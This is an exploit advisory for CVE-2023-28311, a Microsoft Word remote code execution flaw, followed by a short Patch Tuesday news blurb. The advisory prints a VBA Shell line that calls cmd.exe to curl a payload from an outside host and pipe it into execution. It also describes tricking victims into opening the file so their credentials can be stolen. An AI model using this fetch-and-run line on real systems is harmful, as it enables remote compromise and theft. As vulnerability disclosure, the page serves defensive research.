Headline
Microsoft Word Remote Code Execution
Microsoft Word appears to suffer from a remote code execution vulnerability when a user load a malicious file that reaches out to an attacker-controller server to get a hostile payload.
## Title: Microsoft Word Remote Code Execution Vulnerability## Author: nu11secur1ty## Date: 04.14.2023## Vendor: https://www.microsoft.com/## Software:https://www.microsoft.com/en-us/microsoft-365/word?activetab=tabs%3afaqheaderregion3## Reference:https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/## CVE-2023-28311## Description:The attack itself is carried out locally by a user with authentication tothe targeted system. An attacker could exploit the vulnerability byconvincing a victim, through social engineering, to download and open aspecially crafted file from a website which could lead to a local attack onthe victim's computer. The attacker can trick the victim to open amalicious web page by using a `Word` malicious file and he can stealcredentials, bank accounts information, sniffing and tracking all thetraffic of the victim without stopping - it depends on the scenario and etc.STATUS: HIGH Vulnerability[+]Exploit:The exploit server must be BROADCASTING at the moment when the victim hitthe button of the exploit!```vbs Call Shell("cmd.exe /S /c" & "curl -shttp://tarator.com/ChushkI/ebanie.tarator | tarator", vbNormalFocus)```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-mitre/tree/main/2023/CVE-2023-28311)## Reference:[href](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-28311)[href](https://www.crowdstrike.com/cybersecurity-101/remote-code-execution-rce/)## Proof and Exploit[href](https://streamable.com/s60x3k)## Time spend:01:00:00
Related news
Microsoft Patch Tuesday April 2023: CLFS EoP, Word RCE, MSMQ QueueJumper RCE, PCL6, DNS, DHCP
Hello everyone! This episode will be about Microsoft Patch Tuesday for April 2023, including vulnerabilities that were added between February and March Patch Tuesdays. As usual, I use my open source Vulristics project to analyse and prioritize vulnerabilities. I took the comments about the vulnerabilities from the Qualys, Tenable, Rapid7, ZDI Patch Tuesday reviews. And this is […]
CVE-2023-28311
Microsoft Word Remote Code Execution Vulnerability